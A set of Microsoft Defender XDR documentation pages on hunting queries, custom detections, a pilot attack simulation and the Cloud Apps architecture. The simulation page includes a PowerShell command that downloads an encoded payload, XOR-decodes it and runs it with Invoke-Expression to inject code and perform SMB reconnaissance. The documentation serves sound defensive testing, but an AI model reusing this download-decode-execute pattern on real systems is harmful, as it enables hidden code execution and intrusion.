- 1. Change the time frame of the query to the last 24 hours. Assuming the email you sent when you ran the simulation above was in the past 24 hours, otherwise change the time frame as needed.
-
- 1. Select **Run query**. You may have differing results depending on your pilot environment.
-
- > [!NOTE]
- > See the next step for filtering options to limit data return.
-
- :::image type="content" source="../../media/advanced-hunting-incident-response-try-1.png" alt-text="The Advanced Hunting page in the Microsoft Defender portal" lightbox="../../media/advanced-hunting-incident-response-try-1.png":::
-
- > [!NOTE]
- > Advanced hunting displays query results as tabular data. You can also opt to view the data in other format types such as charts.
-
- 1. Look at the results and see if you can identify the email you opened. It may take up to two hours for the message to show up in advanced hunting. To narrow down the results, you can add the **where** condition to your query to only look for emails that have "yahoo.com" as their SenderMailFromDomain. Here's an example.
-
- ```console
- EmailEvents
- | where SenderMailFromDomain == "yahoo.com"
- ```
-
- 1. Click the resulting rows from the query so you can inspect the record.
-
- :::image type="content" source="../../media/advanced-hunting-incident-response-try-2.png" alt-text="The Inspect record section of the Advanced Hunting page in the Microsoft Defender portal" lightbox="../../media/advanced-hunting-incident-response-try-2.png":::
-
-4. Now that you have verified that you can see the email, add a filter for the attachments. Focus on all emails with attachments in the environment. For this simulation, focus on inbound emails, not those that are being sent out from your environment. Remove any filters you have added to locate your message and add "| where **AttachmentCount > 0** and **EmailDirection** == **"Inbound""**
-
- The following query will show you the result with a shorter list than your initial query for all email events:
-
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- ```
-
-5. Next, include the information about the attachment (such as: file name, hashes) to your result set. To do so, join the **EmailAttachmentInfo** table. The common fields to use for joining, in this case are **NetworkMessageId** and **RecipientObjectId**.
-
- The following query also includes an additional line "| **project-rename EmailTimestamp=Timestamp**" that'll help identify which timestamp was related to the email versus timestamps related to file actions that you'll add in the next step.
-
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- ```
-
-6. Next, use the **SHA256** value from the **EmailAttachmentInfo** table to find **DeviceFileEvents** (file actions that happened on the endpoint) for that hash. The common field here will be the SHA256 hash for the attachment.
-
- The resulting table now includes details from the endpoint (Microsoft Defender for Endpoint) such as device name, what action was done (in this case, filtered to only include FileCreated events), and where the file was stored. The account name associated with the process will also be included.
-
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- | join DeviceFileEvents on SHA256
- | where ActionType == "FileCreated"
- ```
-
- You've now created a query that'll identify all inbound emails where the user opened or saved the attachment. You can also refine this query to filter for specific sender domains, file sizes, file types, and so on.
-
-7. Functions are a special kind of join, which let you pull more TI data about a file like its prevalence, signer and issuer info, etc. To get more details on the file, use the **FileProfile()** function enrichment:
-
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- | join DeviceFileEvents on SHA256
- | where ActionType == "FileCreated"
- | distinct SHA1
- | invoke FileProfile()
- ```
-
-#### Create a detection
-
-Once you have created a query that identifies information that you'd like to **get alerted** about if they happen in the future, you can create a custom detection from the query.
-
-Custom detections will run the query according to the frequency you set, and the results of the queries will create security alerts, based on the impacted assets you choose. Those alerts will be correlated to incidents and can be triaged as any other security alert generated by one of the products.
-
-1. On the query page, remove lines 7 and 8 that were added in step 7 of the Go hunting instructions and click **Create detection rule**.
-
- :::image type="content" source="../../media/advanced-hunting-incident-response-try-3.png" alt-text="The Query editing section of the Advanced Hunting page in the Microsoft Defender portal" lightbox="../../media/advanced-hunting-incident-response-try-3.png":::
-
- > [!NOTE]
- > If you click **Create detection rule** and you have syntax errors in your query, your detection rule won't be saved. Double-check your query to ensure there's no errors.
-
-2. Fill in the required fields with the information that will allow the security team to understand the alert, why it was generated, and what actions you expect them to take.
-
- :::image type="content" source="../../media/mtp/fig23.png" alt-text="The Alert details page in the Microsoft Defender portal" lightbox="../../media/mtp/fig23.png":::
-
- Ensure that you fill out the fields with clarity to help give the next user an informed decision about this detection rule alert
-
-3. Select what entities are impacted in this alert. In this case, select **Device** and **Mailbox**.
-
- :::image type="content" source="../../media/mtp/fig24.png" alt-text="The Impacted entities details page in the Microsoft Defender portal" lightbox="../../media/mtp/fig24.png":::
-
-4. Determine what actions should take place if the alert is triggered. In this case, run an antivirus scan, though other actions could be taken.
-
- :::image type="content" source="../../media/mtp/fig25.png" alt-text="The Actions page in the Microsoft Defender portal" lightbox="../../media/mtp/fig25.png":::
-
-5. Select the scope for the alert rule. Since this query involves devices, the device groups are relevant in this custom detection according to Microsoft Defender for Endpoint context. When creating a custom detection that does not include devices as impacted entities, scope does not apply.
-
- :::image type="content" source="../../media/mtp/fig26.png" alt-text="The Scope page in the Microsoft Defender portal" lightbox="../../media/mtp/fig26.png":::
--
- For this pilot, you might want to limit this rule to a subset of testing devices in your production environment.
-
-6. Select **Create**. Then, select **Custom detection rules** from the navigation panel.
-
- :::image type="content" source="../../media/mtp/fig27a.png" alt-text="The Custom detection rules rules option in the Microsoft Defender portal" lightbox="../../media/mtp/fig27a.png":::
-
- :::image type="content" source="../../media/mtp/fig27b.png" alt-text="The page displaying the detection rules and execution details in the Microsoft Defender portal" lightbox="../../media/mtp/fig27b.png":::
-
- From this page, you can select the detection rule, which will open a details page.
-
- :::image type="content" source="../../media/mtp/fig28.png" alt-text="The page displaying details of the triggered alerts in the Microsoft Defender portal" lightbox="../../media/mtp/fig28.png":::
--
-### Expert training on advanced hunting
-
-**Tracking the adversary** is a webcast series for new security analysts and seasoned threat hunters. It guides you through the basics of advanced hunting all the way to creating your own sophisticated queries.
-
-See [Get expert training on advanced hunting](advanced-hunting-expert-training.md) to get started.
-
-### Navigation you may need
-
-[Create the Microsoft Defender XDR Evaluation Environment](eval-create-eval-environment.md)
security Eval Defender Investigate Respond Simulate Attack https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-investigate-respond-simulate-attack.md
- Title: Run an attack simulation in a Microsoft Defender XDR pilot environment
-description: Run attack simulations for Microsoft Defender XDR to see how alerts and incidents are presented, insights are gained, and threats are quickly remediated.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-pilotmtpproject
- - zerotrust-solution
- - highpri
- - tier1
----
-# Run an attack simulation in a Microsoft Defender XDR pilot environment
-
-This article is [Step 1 of 2](eval-defender-investigate-respond.md) in the process of performing an investigation and response of an incident in Microsoft Defender XDR using a pilot environment. For more information about this process, see the [overview](eval-defender-investigate-respond.md) article.
-
-After preparing your [pilot environment](eval-defender-investigate-respond.md), it's time to test Microsoft Defender XDR's incident response and automated investigation and remediation capabilities by creating an incident with a simulated attack and using the Microsoft Defender portal to investigate and respond.
-
-An incident in Microsoft Defender XDR is a collection of correlated alerts and associated data that make up the story of an attack.
-
-Microsoft 365 services and apps create alerts when they detect a suspicious or malicious event or activity. Individual alerts provide valuable clues about a completed or ongoing attack. However, attacks typically employ various techniques against different types of entities, such as devices, users, and mailboxes. The result is multiple alerts for multiple entities in your tenant.
-
-> [!NOTE]
-> If you are brand new to security analysis and incident response, see the [Respond to your first incident walkthrough](first-incident-overview.md) to get a guided tour of a typical process of analysis, remediation, and post-incident review.
-
-<a name='simulate-attacks-with-the-microsoft-365-defender-portal'></a>
-
-## Simulate attacks with the Microsoft Defender portal
-
-The Microsoft Defender portal has built-in capabilities to create simulated attacks on your pilot environment:
--- Attack simulation training for Microsoft Defender XDR for Office 365 at [https://security.microsoft.com/attacksimulator](https://security.microsoft.com/attacksimulator).-
- In the Microsoft Defender portal, select **Email & collaboration > Attack simulation training**.
--- Attack tutorials & simulations for Microsoft Defender XDR for Endpoint at [https://security.microsoft.com/tutorials/simulations](https://security.microsoft.com/tutorials/simulations).-
- In the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>, select **Endpoints > Tutorials & simulations**.
-
-### Defender for Office 365 Attack simulation training
-
-Defender for Office 365 with Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2 includes attack simulation training for phishing attacks. The basic steps are:
-
-1. Create a simulation
-
- For step by step instructions on how to create and launch a new simulation, see [Simulate a phishing attack](/microsoft-365/security/office-365-security/attack-simulation-training-simulations).
-
-2. Create a payload
-
- For step by step instructions on how to create a payload for use within a simulation, see [Create a custom payload for attack simulation training](/microsoft-365/security/office-365-security/attack-simulation-training-payloads).
-
-3. Gaining insights
-
- For step by step instructions on how to gain insights with reporting, see [Gain insights through attack simulation training](/microsoft-365/security/office-365-security/attack-simulation-training-insights).
-
- > [!VIDEO https://www.microsoft.com/videoplayer/embed/RWMhvB]
-
-For more information, see [Simulations](/microsoft-365/security/office-365-security/attack-simulation-training-get-started#simulations).
-
-### Defender for Endpoint attack tutorials & simulations
-
-Here are the Defender for Endpoint simulations from Microsoft:
--- Document drops backdoor-- Automated investigation (backdoor)-
-There are additional simulations from third-party sources. There are also a set of tutorials.
-
-For each simulation or tutorial:
-
-1. Download and read the corresponding walk-through document provided.
-
-2. Download the simulation file. You can choose to download the file or script on the test device but it's not mandatory.
-
-3. Run the simulation file or script on the test device as instructed in the walk-through document.
-
- For more information, see [Experience Microsoft Defender for Endpoint through simulated attack](/microsoft-365/security/defender-endpoint/attack-simulations).
-
-## Simulate an attack with an isolated domain controller and client device (optional)
-
-In this optional incident response exercise, you'll simulate an attack on an isolated Active Directory Domain Services (AD DS) domain controller and Windows device using a PowerShell script and then investigate, remediate, and resolve the incident.
-
-First, you need to add endpoints to your pilot environment.
-
-### Add pilot environment endpoints
-
-First, you need to add an isolated AD DS domain controller and a Windows device to your pilot environment.
-
-1. Verify your pilot environment tenant has [enabled Microsoft Defender XDR](m365d-enable.md#confirm-that-the-service-is-on).
-
-2. Verify that your domain controller:
-
- - Runs Windows Server 2008 R2 or a later version.
- - Reports to [Microsoft Defender for Identity](/azure/security-center/security-center-wdatp) and has enabled [remote management](/windows-server/administration/server-manager/configure-remote-management-in-server-manager).
- - Has [Microsoft Defender for Identity and Microsoft Defender for Cloud Apps integration](/cloud-app-security/mdi-integration) enabled.
- - Has a test user is created in the test domain. Administrator-level permissions are not needed.
-
-3. Verify that your test device:
-
- - Runs Windows 10 version 1903 or a later version.
- - Is joined to the AD DS domain controller domain.
- - Has [Microsoft Defender Antivirus](/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features) enabled. If you are having trouble enabling Microsoft Defender Antivirus, see this [troubleshooting topic](/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-microsoft-defender-antivirus-is-not-disabled-by-a-policy).
- - Is [onboarded to Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
-
-If you use tenant and device groups, create a dedicated device group for the test device and push it to top level.
-
-One alternative is to host your AD DS domain controller and test device as virtual machines in Microsoft Azure infrastructure services. You can use the instructions in [Phase 1 of the simulated enterprise Test Lab Guide](/microsoft-365/enterprise/simulated-ent-base-configuration-microsoft-365-enterprise#phase-1-create-a-simulated-intranet), but skip the creation of the APP1 virtual machine.
-
-Here is the result.
--
-You'll simulate a sophisticated attack that leverages advanced techniques to hide from detection. The attack enumerates opened Server Message Block (SMB) sessions on domain controllers and retrieves recent IP addresses of users' devices. This category of attacks usually doesn't include files dropped on the victim's device and they occur solely in memory. They "live off the land" by using existing system and administrative tools and inject their code into system processes to hide their execution. Such behavior allows them to evade detection and persist on the device.
-
-In this simulation, our sample scenario starts with a PowerShell script. In the real world, a user might be tricked into running a script or the script might run from a remote connection to another computer from a previously infected device, which indicates that the attacker is attempting to move laterally in the network. Detection of these scripts can be difficult because administrators also often run scripts remotely to carry out various administrative activities.
--
-During the simulation, the attack injects shellcode into a seemingly innocent process. The scenario requires the use of notepad.exe. We chose this process for the simulation, but attackers would more likely target a long-running system process, such as svchost.exe. The shellcode then goes on to contact the attacker's command-and-control (C2) server to receive instructions on how to proceed. The script attempts executing reconnaissance queries against the domain controller (DC). Reconnaissance allows an attacker to get information about recent user login information. Once attackers have this information, they can move laterally in the network to get to a specific sensitive account
-
-> [!IMPORTANT]
-> For optimum results, follow the attack simulation instructions as closely as possible.
-
-### Run the isolated AD DS domain controller attack simulation
-
-To run the attack scenario simulation:
-
-1. Ensure that your pilot environment includes the isolated AD DS domain controller and Windows device.
-
-2. Sign in to the test device with the test user account.
-
-3. Open a Windows PowerShell window on the test device.
-
-4. Copy the following simulation script:
-
- ```powershell
- [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- ;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
- $base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
- $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
- $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
- ```
-
- > [!NOTE]
- > If you open this article on a web browser, you might encounter problems copying the full text without losing certain characters or introducing extra line breaks. If this is the case, download this document and open it on Adobe Reader.
-
-5. Paste and run the copied script in the PowerShell window.
-
-> [!NOTE]
-> If you're running PowerShell using remote desktop protocol (RDP), use the Type Clipboard Text command in the RDP client because the **CTRL-V** hotkey or right-click-paste method might not work. Recent versions of PowerShell sometimes will also not accept that method, you might have to copy to Notepad in memory first, copy it in the virtual machine, and then paste it into PowerShell.
-
-A few seconds later, the Notepad app will open. A simulated attack code will be injected into Notepad. Keep the automatically generated Notepad instance open to experience the full scenario.
-
-The simulated attack code will attempt to communicate to an external IP address (simulating the C2 server) and then attempt reconnaissance against the domain controller through SMB.
-
-You'll see this message displayed on the PowerShell console when this script completes:
-
-```console
-ran NetSessionEnum against [DC Name] with return code result 0
-```
-
-To see the Automated Incident and Response feature in action, keep the notepad.exe process open. You'll see Automated Incident and Response stop the Notepad process.
-
-### Investigate the incident for the simulated attack
-
-> [!NOTE]
-> Before we walk you through this simulation, watch the following video to see how incident management helps you piece the related alerts together as part of the investigation process, where you can find it in the portal, and how it can help you in your security operations:
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bzwz?]
-
-Switching to the SOC analyst point of view, you can now start to investigate the attack in the Microsoft Defender portal.
-
-1. Open the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.
-
-2. From the navigation pane, select **Incidents & Alerts > Incidents**.
-
-3. The new incident for the simulated attack will appear in the incident queue.
-
- :::image type="content" source="../../media/mtp/fig2.png" alt-text="An example of the Incidents queue" lightbox="../../media/mtp/fig2.png":::
-
-#### Investigate the attack as a single incident
-
-Microsoft Defender XDR correlates analytics and aggregates all related alerts and investigations from different products into one incident entity. By doing so, Microsoft Defender XDR shows a broader attack story, allowing the SOC analyst to understand and respond to complex threats.
-
-The alerts generated during this simulation are associated with the same threat, and as a result, are automatically aggregated as a single incident.
-
-To view the incident:
-
-1. Open the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.
-
-2. From the navigation pane, select **Incidents & Alerts > Incidents**.
-
-3. Select the newest item by clicking on the circle located left of the incident name. A side panel displays additional information about the incident, including all the related alerts. Each incident has a unique name that describes it based on the attributes of the alerts it includes.
-
- The alerts that are shown in the dashboard can be filtered based on service resources: Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, Microsoft Defender for Endpoint, Microsoft Defender XDR, and Microsoft Defender for Office 365.
-
-4. Select **Open incident page** to get more information about the incident.
-
- In the **Incident** page, you can see all the alerts and information related to the incident. The information includes the entities and assets that are involved in the alert, the detection source of the alerts (such as Microsoft Defender for Identity or Microsoft Defender for Endpoint), and the reason they were linked together. Reviewing the incident alert list shows the progression of the attack. From this view, you can see and investigate the individual alerts.
-
- You can also click **Manage incident** from the right-hand menu, to tag the incident, assign it to yourself, and add comments.
-
-#### Review generated alerts
-
-Let's look at some of the alerts generated during the simulated attack.
-
-> [!NOTE]
-> We'll walk through only a few of the alerts generated during the simulated attack. Depending on the version of Windows and the Microsoft Defender XDR products running on your test device, you might see more alerts that appear in a slightly different order.
--
-##### Alert: Suspicious process injection observed (Source: Microsoft Defender for Endpoint)
-
-Advanced attackers use sophisticated and stealthy methods to persist in memory and hide from detection tools. One common technique is to operate from within a trusted system process rather than a malicious executable, making it hard for detection tools and security operations to spot the malicious code.
-
-To allow the SOC analysts to catch these advanced attacks, deep memory sensors in Microsoft Defender for Endpoint provide our cloud service with unprecedented visibility into a variety of cross-process code injection techniques. The following figure shows how Defender for Endpoint detected and alerted on the attempt to inject code to <i>notepad.exe</i>.
--
-##### Alert: Unexpected behavior observed by a process run with no command-line arguments (Source: Microsoft Defender for Endpoint)
-
-Microsoft Defender for Endpoint detections often target the most common attribute of an attack technique. This method ensures durability and raises the bar for attackers to switch to newer tactics.
-
-We employ large-scale learning algorithms to establish the normal behavior of common processes within an organization and worldwide and watch for when these processes show anomalous behaviors. These anomalous behaviors often indicate that extraneous code was introduced and is running in an otherwise trusted process.
-
-For this scenario, the process <i>notepad.exe</i> is exhibiting abnormal behavior, involving communication with an external location. This outcome is independent of the specific method used to introduce and execute the malicious code.
-
-> [!NOTE]
-> Because this alert is based on machine learning models that require additional backend processing, it might take some time before you see this alert in the portal.
-
-Notice that the alert details include the external IP addressΓÇöan indicator that you can use as a pivot to expand investigation.
-
-Select the IP address in the alert process tree to view the IP address details page.
--
-The following figure displays the selected IP Address details page (clicking on IP address in the Alert process tree).
--
-##### Alert: User and IP address reconnaissance (SMB) (Source: Microsoft Defender for Identity)
-
-Enumeration using Server Message Block (SMB) protocol enables attackers to get recent user logon information that helps them move laterally through the network to access a specific sensitive account.
-
-In this detection, an alert is triggered when the SMB session enumeration runs against a domain controller.
--
-#### Review the device timeline with Microsoft Defender for Endpoint
-
-After exploring the various alerts in this incident, navigate back to the incident page you investigated earlier. Select the **Devices** tab in the incident page to review the devices involved in this incident as reported by Microsoft Defender for Endpoint and Microsoft Defender for Identity.
-
-Select the name of the device where the attack was conducted, to open the entity page for that specific device. In that page, you can see alerts that were triggered and related events.
-
-Select the **Timeline** tab to open the device timeline and view all events and behaviors observed on the device in chronological order, interspersed with the alerts raised.
--
-Expanding some of the more interesting behaviors provides useful details, such as process trees.
-
-For example, scroll down until you find the alert event **Suspicious process injection observed**. Select the **powershell.exe injected to notepad.exe process** event below it, to display the full process tree for this behavior under the **Event entities** graph on the side pane. Use the search bar for filtering if necessary.
--
-#### Review the user information with Microsoft Defender for Cloud Apps
-
-On the incident page, select the **Users** tab to display the list of users involved in the attack. The table contains additional information about each user, including each user's **Investigation Priority** score.
-
-Select the user name to open the user's profile page where further investigation can be conducted. [Read more about investigating risky users](/cloud-app-security/tutorial-ueba#identify).
--
-#### Automated investigation and remediation
-
-> [!NOTE]
-> Before we walk you through this simulation, watch the following video to get familiar with what automated self-healing is, where to find it in the portal, and how it can help in your security operations:
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4BzwB]
-
-Navigate back to the incident in the Microsoft Defender portal. The **Investigations** tab in the **Incident** page shows the automated investigations that were triggered by Microsoft Defender for Identity and Microsoft Defender for Endpoint. The screenshot below displays only the automated investigation triggered by Defender for Endpoint. By default, Defender for Endpoint automatically remediates the artifacts found in the queue, which requires remediation.
--
-Select the alert that triggered an investigation to open the **Investigation details** page. You'll see the following details:
--- Alert(s) that triggered the automated investigation.-- Impacted users and devices. If indicators are found on additional devices, these additional devices will be listed as well.-- List of evidence. The entities found and analyzed, such as files, processes, services, drivers, and network addresses. These entities are analyzed for possible relationships to the alert and rated as benign or malicious.-- Threats found. Known threats that are found during the investigation.-
-> [!NOTE]
-> Depending on timing, the automated investigation might still be running. Wait a few minutes for the process to complete before you collect and analyze the evidence and review the results. Refresh the **Investigation details** page to get the latest findings.
--
-During the automated investigation, Microsoft Defender for Endpoint identified the notepad.exe process, which was injected as one of the artifacts requiring remediation. Defender for Endpoint automatically stops the suspicious process injection as part of the automated remediation.
-
-You can see <i>notepad.exe</i> disappear from the list of running processes on the test device.
-
-#### Resolve the incident
-
-After the investigation is complete and confirmed to be remediated, you resolve the incident.
-
-From the **Incident** page, select **Manage incident**. Set the status to **Resolve incident** and select **True alert** for the classification and **Security testing** for the determination.
--
-When the incident is resolved, it resolves all of the associated alerts in the Microsoft Defender portal and the related portals.
-
-This wraps up attack simulations for incident analysis, automated investigation, and incident resolution.
-
-## Next step
-
-[:::image type="content" source="../../medi)
-
-Step 2 of 2: [Try Microsoft Defender XDR incident response capabilities](eval-defender-investigate-respond-additional.md)
-
-### Navigation you may need
-
-[Create the Microsoft Defender XDR Evaluation Environment](eval-create-eval-environment.md)
security Eval Defender Investigate Respond https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-investigate-respond.md
- Title: Investigate and respond using Microsoft Defender XDR in a pilot environment
-description: Set up attack simulations in Microsoft Defender XDR trial lab or pilot environment to try out the security solution designed to teach users to protect devices, identity, data, and applications.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Step 6. Investigate and respond using Microsoft Defender XDR in a pilot environment
-
-**Applies to:**
-- Microsoft Defender XDR-
-This article outlines the process to create incidents with attack simulations and tutorials and use Microsoft Defender XDR to investigate and respond. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft Defender XDR](eval-overview.md) and you have [created the Microsoft Defender XDR evaluation environment](eval-create-eval-environment.md).
-
-Use the following steps.
--
-The following table describes the steps in the illustration.
-
-|Step|Description|
-|||
-|1. [Simulate attacks](eval-defender-investigate-respond-simulate-attack.md)|Simulate attacks on your evaluation environment and use the Microsoft Defender portal to perform incident response.|
-|2. [Try incident response capabilities](eval-defender-investigate-respond-additional.md)|Try additional incident response features and capabilities in Microsoft Defender XDR.|
-
-## Navigation you may need
-
-[Create the Microsoft Defender XDR Evaluation Environment](eval-create-eval-environment.md)
security Eval Defender Mcas Architecture https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-mcas-architecture.md
- Title: Review architecture requirements and the structure for Microsoft Defender for Cloud Apps
-description: Microsoft Defender for Cloud Apps technical diagrams explain the architecture in Microsoft Defender XDR, which will help you build a pilot environment.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Review architecture requirements and key concepts for Microsoft Defender for Cloud Apps
-
-**Applies to:**
--- Microsoft Defender XDR-
-This article is [Step 1 of 3](eval-defender-mcas-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Cloud Apps alongside Microsoft Defender XDR. For more information about this process, see the [overview article](eval-defender-identity-overview.md).
-
-Before enabling Microsoft Defender for Cloud Apps, be sure you understand the architecture and can meet the requirements.
-
-## Understand the architecture
-
-Microsoft Defender for Cloud Apps is a cloud access security broker (CASB). CASBs act a gatekeeper to broker access in real time between your enterprise users and cloud resources they use, wherever your users are located and regardless of the device they are using. Microsoft Defender for Cloud Apps natively integrates with Microsoft security capabilities, including Microsoft Defender XDR.
-
-Without Defender for Cloud Apps, cloud apps that are used by your organization are unmanaged and unprotected, as illustrated.
--
-In the illustration:
--- The use of cloud apps by an organization is unmonitored and unprotected.-- This use falls outside the protections achieved within a managed organization.-
-### Discovering cloud apps
-
-The first step to managing the use of cloud apps is to discover which cloud apps are used by your organization. This next diagram illustrates how cloud discovery works with Defender for Cloud Apps.
--
-In this illustration, there are two methods that can be used to monitor network traffic and discover cloud apps that are being used by your organization.
--- A. Cloud App Discovery integrates with Microsoft Defender for Endpoint natively. Defender for Endpoint reports cloud apps and services being accessed from IT-managed Windows 10 and Windows 11 devices.-- B. For coverage on all devices connected to a network, the Defender for Cloud Apps log collector is installed on firewalls and other proxies to collect data from endpoints. This data is sent to Defender for Cloud Apps for analysis.-
-### Managing cloud apps
-
-After you discover cloud apps and analyze how these apps are used by your organization, you can begin managing cloud apps that you choose.
--
-In this illustration:
--- Some apps are sanctioned for use. This sanction is a simple way of beginning to manage apps.-- You can enable greater visibility and control by connecting apps with app connectors. App connectors use the APIs of app providers.-
-### Applying session controls to cloud apps
-
-Microsoft Defender for Cloud Apps serves as a reverse proxy, providing proxy access to sanctioned cloud apps. This provision allows Defender for Cloud Apps to apply session controls that you configure.
--
-In this illustration:
--- Access to sanctioned cloud apps from users and devices in your organization is routed through Defender for Cloud Apps.-- This proxy access allows session controls to be applied.-- Cloud apps that you have not sanctioned or explicitly unsanctioned are not affected.-
-Session controls allow you to apply parameters to how cloud apps are used by your organization. For example, if your organization is using Salesforce, you can configure a session policy that allows only managed devices to access your organization's data at Salesforce. A simpler example could be configuring a policy to monitor traffic from unmanaged devices so you can analyze the risk of this traffic before applying stricter policies.
-
-<a name='integrating-with-azure-ad-with-conditional-access-app-control'></a>
-
-### Integrating with Microsoft Entra ID with Conditional Access App Control
-
-You might already have SaaS apps added to your Microsoft Entra tenant to enforce multi-factor authentication and other conditional access policies. Microsoft Defender for Cloud Apps natively integrates with Microsoft Entra ID. All you have to do is configure a policy in Microsoft Entra ID to use Conditional Access App Control in Defender for Cloud Apps. This routes network traffic for these managed SaaS apps through Defender for Cloud Apps as a proxy, which allows Defender for Cloud Apps to monitor this traffic and to apply session controls.
--
-In this illustration:
--- SaaS apps are integrated with the Microsoft Entra tenant. This integration allows Microsoft Entra ID to enforce conditional access policies, including multi-factor authentication.-- A policy is added to Microsoft Entra ID to direct traffic for SaaS apps to Defender for Cloud Apps. The policy specifies which SaaS apps to apply this policy to. Therefore, after Microsoft Entra ID enforces any conditional access policies that apply to these SaaS apps, Microsoft Entra ID then directs (proxies) the session traffic through Defender for Cloud Apps.-- Defender for Cloud Apps monitors this traffic and applies any session control policies that have been configured by administrators.-
-You might have discovered and sanctioned cloud apps using Defender for Cloud Apps that have not been added to Microsoft Entra ID. You can take advantage of Conditional Access App Control by adding these cloud apps to your Microsoft Entra tenant and the scope of your conditional access rules.
-
-### Protecting your organization from hackers
-
-Defender for Cloud Apps provides powerful protection on its own. However, when combined with the other capabilities of Microsoft Defender XDR, Defender for Cloud Apps provides data into the shared signals which (together) helps stop attacks.
-
-It's worth repeating this illustration from the overview to this Microsoft Defender XDR evaluation and pilot guide.
--
-Focusing on the right side of this illustration, Microsoft Defender for Cloud Apps notices anomalous behavior like impossible-travel, credential access, and unusual download, file share, or mail forwarding activity and reports these behaviors to the security team. Therefore, Defender for Cloud Apps helps prevent lateral movement by hackers and exfiltration of sensitive data. Microsoft 356 Defender for Cloud correlates the signals from all the components to provide the full attack story.
-
-## Understand key concepts
-
-The following table identified key concepts that are important to understand when evaluating, configuring, and deploying Microsoft Defender for Cloud Apps.
-
-|Concept |Description |More information |
-||||
-| Defender for Cloud Apps Dashboard | Presents an overview of the most important information about your organization and gives links to deeper investigation. | [Working with the dashboard](/cloud-app-security/daily-activities-to-protect-your-cloud-environment) |
-| Conditional Access App Control | Reverse proxy architecture that integrates with your Identity Provider (IdP) to give Microsoft Entra Conditional Access policies and selectively enforce session controls. | [Protect apps with Microsoft Defender for Cloud Apps Conditional Access App Control](/cloud-app-security/proxy-intro-aad) |
-| Cloud App Catalog | The Cloud App Catalog gives you a full picture against Microsoft catalog of over 16,000 cloud apps that are ranked and scored based on more than 80 risk factors. | [Working with App risk scores](/cloud-app-security/risk-score) |
-| Cloud Discovery Dashboard | Cloud Discovery analyzes your traffic logs and is designed to give more insight into how cloud apps are being used in your organization as well as give alerts and risk levels. | [Working with discovered apps](/cloud-app-security/discovered-apps) |
-|Connected Apps |Defender for Cloud Apps provides end-to-end protection for connected apps using Cloud-to-Cloud integration, API connectors, and real-time access and session controls using our Conditional App Access Controls. |[Protecting connected apps](/cloud-app-security/protect-connected-apps) |
-
-## Review architecture requirements
-
-### Discovering cloud apps
-
-To discover cloud apps used in your environment, you can implement one or both of the following methods:
--- Get up and running quickly with Cloud Discovery by integrating with Microsoft Defender for Endpoint. This native integration enables you to immediately start collecting data on cloud traffic across your Windows 11 and Windows 10 devices, on and off your network.-- To discover all cloud apps accessed by all devices connected to your network, deploy the Defender for Cloud Apps log collector on your firewalls and other proxies. This deployment helps collect data from your endpoints and sends it to Defender for Cloud Apps for analysis. Defender for Cloud Apps natively integrates with some third-party proxies for even more capabilities.-
-These options are included in [Step 2. Enable the evaluation environment](eval-defender-mcas-enable-eval.md).
-
-<a name='applying-azure-ad-conditional-access-policies-to-cloud-apps'></a>
-
-### Applying Microsoft Entra Conditional Access policies to cloud apps
-
-Conditional Access App Control (the ability to apply Conditional Access policies to cloud apps) requires integration with Microsoft Entra ID. This integration isn't a requirement for getting started with Defender for Cloud Apps. It is a step we encourage you to try out during the pilot phaseΓÇö[Step 3. Pilot Microsoft Defender for Cloud Apps](eval-defender-mcas-pilot.md).
-
-## SIEM integration
-
-You can integrate Microsoft Defender for Cloud Apps with your generic SIEM server or with Microsoft Sentinel to enable centralized monitoring of alerts and activities from connected apps.
-
